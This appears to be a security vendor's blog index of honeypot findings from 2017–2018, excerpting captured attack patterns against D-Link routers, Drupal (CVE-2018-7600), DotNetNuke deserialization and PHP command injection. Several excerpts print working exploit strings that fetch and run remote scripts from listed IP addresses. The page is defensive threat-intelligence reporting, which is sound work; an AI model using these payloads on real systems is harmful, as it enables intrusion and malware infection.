Advanced Threat Detection in Phishing Email Attachments
Advanced Threat Detection in Phishing Email Attachments by CloudCoffer
The honeypots apply AI to extract unknown attacks from traffic.
CloudCoffer researchers have discovered that an increasing amount of malware is being placed on services like GitHub, Dropbox, Google Drive, OneDrive, and Discord. These malicious programs evade the detection tools of these platforms through encryption and obfuscation. Hackers then exploit system vulnerabilities or use social engineering to implant these programs on victim systems. Many of […]
Read more: Hackers infiltrate systems using GitHub
Date of Detection: 2018.5.24
Attack Pattern:
URI: /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
Malware: The malware is hosted at this IP address: 185.62.190.191.
Target System: D-Link DSL-2750B
Analysis: Attackers first exploit vulnerable systems and then control them with malware. Because the affected routers fail to validate user input, remote attackers can take control of them without credentials. Due […]
Read more: D-Link Router Vulnerability
Date of Detection: 2018.3.29
Attack Pattern:
URI: /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
Request Body: form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23type%5D=markup&mail%5B%23markup%5D=wget%20http%3A%2F%2F51.254.219.134%2Fdrupal.php
Target System: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code.
Analysis: This issue is not a zero-day vulnerability; it has been assigned CVE-2018-7600. However, attackers are scanning and […]
Read more: Widespread Drupal Arbitrary Code Execution
Date of Detection: 2018.1.30
Description: Cryptocurrency mining is becoming more and more popular. Attackers are widely exploiting victims’ systems to mine digital currencies for profit. According to a news report on February 21st, 2018, even Tesla cloud resources were hacked to run cryptocurrency-mining malware. As CloudCoffer’s honeypots keep detecting this type of exploit and […]
Read more: Honeypot Extraction – Digital Currency Mining
Date of Detection: 2017.12.11
Source IP Addresses: 173.212.217.181, 149.255.35.91
Attack Raw Pattern: DNNPersonalization=<profile><item key=\"key\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"><ExpandedWrapperOfObjectStateFormatterObjectDataProvider> <ProjectedProperty0> <ObjectInstance p3:type=\"ObjectStateFormatter\" xmlns:p3=\"http://www.w3.org/2001/XMLSchema-instance\" /> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:q1=\"http://www.w3.org/2001/XMLSchema\" p5:type=\"q1:string\" xmlns:p5=\"http://www.w3.org/2001/XMLSchema-instance\">[…]</anyType> </MethodParameters> </ProjectedProperty0> </ExpandedWrapperOfObjectStateFormatterObjectDataProvider></item></profile>;
Target System: Windows with .NET Framework
Malicious File Path from the […]
Read more: Honeypot Extraction - Windows .NET Framework
Date of Detection: 2017.11.20
Source IP Addresses: 27.255.77.103
Attack Raw Pattern: After decoding the URL, the pattern is as follows.
<? system("cd /tmp ; wget http://175.126.167.52/apache.txt ; curl -O http://175.126.167.52/apache.txt ; fetch http://175.126.167.52/apache.txt ; chmod +x apache.txt ; perl apache.txt ; rm -rf apache.txt ; history -c "); ?>
Malicious File Path from the […]
Read more: Honeypot Extraction - Command Injection